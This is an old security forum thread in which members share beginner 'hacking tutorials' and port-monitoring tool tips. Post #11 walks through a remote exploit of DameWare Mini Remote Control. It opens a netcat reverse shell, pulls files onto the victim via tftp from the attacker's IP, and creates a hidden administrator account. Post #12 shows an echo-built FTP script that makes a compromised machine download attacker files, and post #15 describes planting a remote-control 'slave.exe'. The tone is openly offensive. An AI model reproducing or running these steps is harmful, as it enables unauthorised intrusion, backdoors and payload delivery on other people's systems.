Government Security
Network Security Resources

Jump to content

Tutorials.

security hacking tutorial
  • Please log in to reply
67 replies to this topic

#1 Guest_Jay_*

Guest_Jay_*
  • Guests

Posted 02 February 2004 - 12:18 PM

Maybe you’re just starting out and new to hacking & security.How about writing a mini tutorial every time you learn something new. This will help you consolidate your understanding and enable you to teach new members something so we all learn.

Look forward to reading them.

#2 Train25

Train25

    Private First Class

  • Members
  • 82 posts

Posted 02 February 2004 - 04:26 PM

I would have to agree. This would spread the knowledge and cover all members from the novice to advanced user.

Maybe something for the admins and mods to discuss??

#3 Guest_sweetangel_4u62_*

Guest_sweetangel_4u62_*
  • Guests

Posted 04 February 2004 - 04:07 PM

Hi... Im new to all this... i would like to know where i could get a good "port listener" (in my b-f's words) So i can see if someone is hacking me i guess....

:(

#4 Jeremy

Jeremy

    Commander in Chief

  • Retired Admin
  • 2,459 posts

Posted 04 February 2004 - 05:26 PM

netstat -ao
a = listens to all posts
o = shows the PID so u know what app it is taht is listening to that port.
PS why are u posting this to this thread?

#5 forza

forza

    Private First Class

  • Members
  • 88 posts

Posted 12 February 2004 - 03:20 PM

much better than netstat is Fport
http://www.foundston...ddesc/fport.htm

#6 whiskah

whiskah

    Staff Sergeant

  • Sergeant Major
  • 397 posts

Posted 13 February 2004 - 09:15 AM

or better yet a gui one... TCPVIEW from sysinternals

#7 Guest_darksp1d3r_*

Guest_darksp1d3r_*
  • Guests

Posted 14 February 2004 - 07:17 AM

Try SNORT ;)

#8 Guest_Jay_*

Guest_Jay_*
  • Guests

Posted 14 February 2004 - 07:38 AM

This thread was meant to encourage people to write mini tutorials and be a place that they could post them if they didn't have full membership status.

#9 forza

forza

    Private First Class

  • Members
  • 88 posts

Posted 16 February 2004 - 01:17 AM

sorry but whiskah is right tcpview is also a goodone
http://www.sysintern...e/tcpview.shtml

Btw
how can you i become a Member? (not trial)

#10 TECHgenius

TECHgenius

    Private First Class

  • Members
  • 51 posts

Posted 16 February 2004 - 08:27 AM

You must be active in the forum and make some good posts then you'll be promoted.

#11 forza

forza

    Private First Class

  • Members
  • 88 posts

Posted 16 February 2004 - 11:21 AM

Tutorial for beginners:
DameWare Mini Remote Control v3.72 & v3.73 remote exploit

Tools:
* NetCat
* Autototof_dameware_3.72_3.73.rar (http://www.kyoshi.nl...e_3.72_3.73.rar)
* TFTP server

Open command prompt, go to the folder with nc.exe now give the follow command:
nc -L -vv -p <port>

For example:
C:\>nc -L -vv -p 4567
listening on [any] 4567 ...

Netcat is now listening and waiting to be changed in a reverse command line.

Go to your autototof_dameware_3.72_3.73 directory and start damwre.bat.
(you can scan and hack)
Here I wanna hack a dmware 3.73 machine so I choose 6.
Enter ip (hacked ip)
1**.1**.*.5
give me your ip
1**.1**.*.*
give me your port
4567 <port used in netcat>
give me variant winXP(0,1,2)
0

If all goes well, you get this screen:

[Crpt] DameWare Mini Remote Control < v3.73 remote exploit by kralor [Crpt]
www.coromputer.net && undernet #coromputer

[+] Connecting to ***.***.*.5 ...Done
[+] Gathering information ...Done
[i] Operating system : Win2000
[i] Service Pack : 4
[+] Setting shellc0de for this version ...Done
[+] Sending evil packet ...Patched

Now you get in Netcat a prompt for the remote machine
C:\windows\system32>

Now you can start moving files to the remote machine with tftp
tftp.exe -i YOURIP get FILE c:\Winnt\system32\FILE
And starting backdoor services or ...

Make your admin account
net user USERNAME PASSWORD /add
net localgroup administrators USERNAME /add

Enjoy Your Hack!

EDITED No IP address should be posted. Thanks

#12 Guest_Qlimax_*

Guest_Qlimax_*
  • Guests

Posted 17 February 2004 - 08:14 AM

hello ha everybody (:
there is a tut' for how using echo.
i don't know evreything about echo but i know: if u want to use echo u need FTP.EXE file on the box u try to hack.
ok we start:
first u need to open server on ur box.
open new folder (whatever u want on which drive u want) and put there the files u want to upload.
open user with ur server app and and home dired the user on the folder u open.
now go to the cmd\shell\whatever u have and wirte the commands:
echo open <YOUR IP> <YOUR PORT SERVER> >> x.txt
echo <SERVER USER> >> x.txt
echo <SERVER PASS> >> x.txt
echo hash >> x.txt
echo bin >> x.txt
echo prompt >> x.txt
echo cd C:\WINnt\system32 >> x.txt
echo lcd C:\WINnt\system32 >> x.txt
echo mget *.* >> x.txt
echo bye >> x.txt
ftp -s:x.txt
del x.txt
after u wirte the command's u see the remote box starting to download from u box after its finshed u can do whatever u want.
i hope i help u Qlimax. :)

#13 Guest_mrmoose²_*

Guest_mrmoose²_*
  • Guests

Posted 17 February 2004 - 02:42 PM

I Have a question how can I scan Anon pubs like Grims ping but with
SuperScanner 4.00 ? can someone help ?

#14 Guest_DiabloPatch_*

Guest_DiabloPatch_*
  • Guests

Posted 18 February 2004 - 08:52 AM

A nice site with some tuts I made (DiabloHorn) and also tut's from some other peeps. and a few tools hope you peeps enjoy :)

hxxp://www.woodys-software.tk

Availible tut's on the site:

Escalating privileges on Windows 2000 & XP
Escalating privileges on Windows 2000
How to hack IIS 5.0 through WebDAV
Netbios hacking
Gathering info on remote host
The Road To Becoming A Hacker
Many ways to obtain an IP
Serv-U Error 100
Hacking Secured SQL
File Transfer Methods
SQL: Problems and Solutions
Hacking msadc (NT IIS MDAC RDS Vulnerability)
Hacking Basics Part 1
Hacking Basics Part 2
Hacking Basics Part 3
Hacking Basics Part 4
Hacking Basics Part 5

#15 Todd

Todd

    Private

  • Members
  • 10 posts

Posted 22 February 2004 - 12:20 AM

when i do the DMW sometimes i cant get the hack(win98) so a friend of mine told me to make a slave.exe for a remote proggy i echo get that to the site to and install it that way i got another access to the site to work from thats usaly solve my prob

just thourgh i would share that :-)





Also tagged with one or more of these keywords: security, hacking, tutorial